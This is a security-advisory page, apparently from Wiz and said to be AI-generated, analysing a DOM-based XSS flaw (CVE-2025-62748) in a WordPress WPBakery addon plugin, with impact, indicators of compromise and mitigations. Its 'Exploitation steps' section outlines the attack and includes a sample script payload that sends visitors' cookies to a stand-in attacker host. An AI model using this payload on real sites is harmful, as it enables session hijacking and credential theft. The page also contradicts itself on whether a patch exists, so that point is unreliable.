CVE-2025-62748: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-62748 is a DOM-Based Cross-Site Scripting (XSS) vulnerability in the "Web and WooCommerce Addons for WPBakery Builder" WordPress plugin (slug: vc-addons-by-bit14) developed by Genetech Products. It affects all versions through and including 1.5, with no patched version officially available at the time of disclosure. The vulnerability was reported by researcher Muhammad Yudha - DJ on October 17, 2025, and publicly disclosed by Patchstack on December 31, 2025. It carries a CVSS v3.1 base score of 6.5 (Medium), assigned by Patchstack (Patchstack).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation) and manifests as DOM-Based XSS, meaning malicious payloads are processed and executed within the browser's DOM without necessarily being reflected from the server. Exploitation requires an authenticated user with at least Contributor or Developer-level privileges to craft or submit content containing a malicious script, which is then executed in the browser of a visiting user who interacts with the affected page. The attack vector is network-based with low attack complexity, but requires user interaction from a privileged user to trigger execution. No detailed technical write-up or public PoC code has been identified beyond the Patchstack advisory (Patchstack).

Impact

Successful exploitation allows an attacker with low-privilege authenticated access (Contributor or Developer role) to inject malicious JavaScript into pages built with the WPBakery Builder plugin, which executes in the browsers of site visitors. This can lead to session hijacking, credential theft, malicious redirects, defacement, or delivery of further malware payloads to site visitors. The CVSS scope is marked as "Changed," indicating the impact extends beyond the vulnerable component to affect end users' browsers, with low confidentiality, integrity, and availability impacts (Patchstack).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-62748. The EPSS score is approximately 0.034% (0.000340), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack rates this as low priority, noting it is unlikely to be exploited in targeted attacks, though XSS vulnerabilities in WordPress plugins are sometimes leveraged in mass-exploit campaigns (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the "Web and WooCommerce Addons for WPBakery Builder" plugin (slug: vc-addons-by-bit14) at version 1.5 or earlier, using tools like WPScan or by inspecting plugin directories.
  2. Obtain low-privilege access: Acquire or register an account with at least Contributor or Developer privileges on the target WordPress site.
  3. Craft malicious content: Create or edit a page/post using the WPBakery Builder interface, injecting a DOM-based XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable plugin parameter or shortcode attribute.
  4. Publish or share the page: Publish the crafted page or share a link to it, ensuring a privileged user (or site visitor) loads the page in their browser.
  5. Payload execution: When a victim visits the page, the browser processes the malicious DOM manipulation, executing the injected script and potentially exfiltrating session cookies or performing actions on behalf of the victim (Patchstack).

Indicators of compromise

  • Logs: WordPress access logs showing unusual POST requests to page/post editing endpoints (/wp-admin/post.php) from low-privilege accounts containing encoded script tags or JavaScript event handlers in WPBakery shortcode parameters.
  • File System: Unexpected modifications to page content in the WordPress database (wp_posts table) containing <script>, javascript:, or DOM manipulation patterns within WPBakery shortcode attributes.
  • Network: Outbound requests from victim browsers to unknown external domains shortly after loading pages built with the WPBakery plugin, potentially indicating cookie or credential exfiltration.
  • Logs: Browser console errors or JavaScript exceptions related to DOM manipulation on pages using the vc-addons-by-bit14 plugin components.

Mitigation and workarounds

At the time of disclosure, no official patched version was available from the plugin vendor (Genetech Products), and Patchstack noted "No official patch available" (Patchstack). Feedly intelligence indicates a fix is available in version 1.6 and later. Recommended actions include: (1) Update the plugin to version 1.6 or later if available; (2) If unable to update, deactivate and remove the plugin until a patch is confirmed; (3) Restrict Contributor/Developer role assignments to trusted users only; (4) Deploy a Web Application Firewall (WAF) or a WordPress security plugin such as Patchstack to virtually patch the vulnerability.

Community reactions

The vulnerability received routine coverage from automated vulnerability tracking services and security feeds upon its December 31, 2025 disclosure. Patchstack, the CNA that assigned and published the CVE, rated it as low priority with no impactful threat, and noted it is unlikely to be exploited in targeted attacks (Patchstack). No notable researcher commentary, vendor statements beyond Patchstack's advisory, or significant media coverage has been identified.

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management